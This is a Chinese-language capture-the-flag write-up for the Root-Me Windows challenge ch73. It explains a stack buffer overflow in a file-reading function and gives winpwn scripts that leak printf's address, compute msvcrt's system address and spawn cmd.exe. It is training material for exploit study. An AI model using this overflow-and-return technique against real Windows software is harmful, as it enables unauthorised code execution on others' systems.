服务交互
SSH连接
1 2
| ssh -p 2225 app-systeme-ch73@challenge05.root-me.org app-systeme-ch73
|
SCP下载文件
1
| scp -r app-systeme-ch73@challenge05.root-me.org:/challenge/app-systeme/ch73/ch73.exe ./
|
题目分析
首先检查保护:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| Results for: .\ch73.exe Dynamic Base : "NotPresent" ASLR : "NotPresent" High Entropy VA : "NotPresent" Force Integrity : "NotPresent" Isolation : "Present" NX : "NotPresent" SEH : "Present" CFG : "NotPresent" RFG : "NotPresent" SafeSEH : "NotPresent" GS : "NotPresent" Authenticode : "NotPresent" .NET : "NotPresent"
|
只开了 SEH
和 Isolation
题目是通过传入文件来运行的
data:image/s3,"s3://crabby-images/337f3/337f37828a3da1c05db602e53450785910d23ab3" alt="Untitled.png"
在 manage_file
函数中,会读入输入的文件的数据到栈上,一个很明显的栈溢出
data:image/s3,"s3://crabby-images/4fc18/4fc1808fea5004c767d1a019fe5cf2c4f58c1497" alt="Untitled 1.png"
其中的 count_chars / count_words / count_lines
会分别计算出 char / word / line
的个数
data:image/s3,"s3://crabby-images/2848a/2848a937a46bc718b2c4a097c2b836f595202dde" alt="Untitled 2.png"
data:image/s3,"s3://crabby-images/ecb37/ecb3705846ead9e753c87f7f49f7f0a5a53c5868" alt="Untitled 3.png"
data:image/s3,"s3://crabby-images/3436d/3436d5fbe9031eb8c2e3f3e965ec1392de144cb9" alt="Untitled 4.png"
利用
首先先泄露出 file
的指针
1 2 3 4 5 6 7 8 9
| from winpwn import *
payload = b"a" * 1 with open("./payload","wb") as f: f.write(payload)
r = process(["./ch73.exe","./payload"])
r.interactive()
|
结果
1 2 3 4 5 6
| File name: ./payload File size: 1 Alphanumerical chars: 1 Words: 1 Lines: 0 File pointer: 77024660
|
这样我们就知道了 file
的指针,之后调用 printf
的导入表来打印出 printf
在 dll
处的地址
data:image/s3,"s3://crabby-images/f01b0/f01b05c1e0269dd08d7211a10d18ac504bb20faf" alt="Untitled 5.png"
data:image/s3,"s3://crabby-images/d7c9a/d7c9a2ab85dd4ff13397358b1a2be7b4a8fe0c18" alt="Untitled 6.png"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| from winpwn import *
payload = "" payload += p32(0x77024660) * (0x2014 // 4) payload += p32(0xdeadbeef) payload += p32(0x00402974) payload += p32(0x004016E3) payload += p32(0x00406200) payload = [ord(i) for i in payload] with open("./payload","wb+") as f: f.write(bytes(payload))
r = process(["./ch73.exe","./payload"])
r.interactive()
|
断在 manage_file
的开头和结尾,首先在开头查看 ebp
及其以上的内存
data:image/s3,"s3://crabby-images/71735/717358b8010f25feece9f4ff18a11f87fb362075" alt="Untitled 7.png"
然后再在结尾查看 ebp
及其以上的内存
data:image/s3,"s3://crabby-images/90a0a/90a0ad2383db4a6c9e6c88f62d38f658714724b7" alt="Untitled 8.png"
其中我们所填写的 0x00402974
类似于 printf@plt
data:image/s3,"s3://crabby-images/3f8cc/3f8cc9236e568dc88ef0bb1b59766088373a27f5" alt="Untitled 9.png"
而 0x00406200
类似于 printf@got
,其实是导出表
data:image/s3,"s3://crabby-images/3421b/3421b465a8a5b774528d9995db0d21dae9ccf74c" alt="Untitled 10.png"
data:image/s3,"s3://crabby-images/f00ab/f00ab20d1f23a08131165aa04e65c459cf60cb6c" alt="Untitled 11.png"
得到结果为 0x76fe4cb0
,查看导入表部分可以知道 printf
在 msvcrt.dll
处
data:image/s3,"s3://crabby-images/667d9/667d9c7cb2f0d31a7be828879fb80e9000e57ec7" alt="Untitled 12.png"
那么打开 C:WindowsSystemSysWOW64\msvcrt.dll
获得就可以计算出基地址,进而得到 system
的地址:
data:image/s3,"s3://crabby-images/dcde1/dcde14ee86829314c0d313701e9c2e5a48906121" alt="Untitled 13.png"
data:image/s3,"s3://crabby-images/9443c/9443c68f9937ba97741f9086b92d58c23a50be97" alt="Untitled 14.png"
data:image/s3,"s3://crabby-images/595dc/595dcd7f5231fb27ba1c0bcc780d5b7c7f13dd59" alt="Untitled 15.png"
最后执行 system("cmd.exe")
即可:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
| from winpwn import *
printf_addr = 0x76fe4cb0 dll_base = printf_addr - 0x10174cb0 system_addr = dll_base + 0x10143d30 cmd_addr = dll_base + 0x101047a4
payload = "" payload += p32(0x77024660) * (0x2014 // 4) payload += p32(0xdeadbeef) payload += p32(system_addr) payload += p32(0x004016E3) payload += p32(cmd_addr) payload = [ord(i) for i in payload] with open("./payload","wb+") as f: f.write(bytes(payload))
r = process(["./ch73.exe","./payload"])
r.interactive()
|